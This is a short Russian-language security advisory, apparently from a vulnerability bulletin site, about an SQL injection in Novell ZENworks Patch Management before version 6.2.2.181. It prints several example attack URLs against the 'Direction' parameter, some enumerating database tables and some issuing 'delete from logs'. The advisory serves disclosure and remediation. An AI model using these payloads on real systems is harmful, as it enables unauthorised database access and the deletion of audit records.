SQL-инъекция в Novell ZENworks Patch Management

Дата публикации:
01.11.2005
Всего просмотров:
1233
Опасность:
Низкая
Наличие исправления:
Да
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Локальная сеть
Воздействие:
Неавторизованное изменение данных
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Novell ZENworks Patch Management 6.x
Уязвимые версии: Novell ZENworks Patch Management версии до 6.2.2.181

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения.

Уязвимость существует при обработке входных данных в параметре "Direction" сценария "computers/default.asp" и в параметрах "SearchText", "StatusFilter" и "computerFilter" в сценарии "reports/default.asp". Удаленный пользователь может с помощью специально сформированного URL выполнить произвольные SQL команды в базе данных приложения. Примеры:

http://192.168.1.10/computers/default.asp?sort=&
Direction=;select+*+from+testclient.master.dbo.sysobjects

http://192.168.1.10/computers/default.asp?sort=&
Direction=;select+*+from+OPENQUERY+(+[testclient],+"
select+@@version;+delete+from+logs")Server 'testclient'
is not configured for DATA ACCESS. [2]

http://192.168.1.10/computers/default.asp?sort=&
Direction=;SELECT+name+FROM+sysobjects+WHERE+xtype+=+"U"

http://192.168.1.10/computers/default.asp?sort=&
Direction=;select+*+from+OPENQUERY+(+[testclient],
+"select+@@version;+delete+from+logs") Server 'testclient'
is not configured for DATA ACCESS.

URL производителя: www.novell.com

Решение: Установите последнюю версию (6.2.2.181) с сайта производителя.

Источник:

Ссылки: Novell ZENworks Patch Management Server 6.0.0.52 - SQL injection

или введите имя

CAPTCHA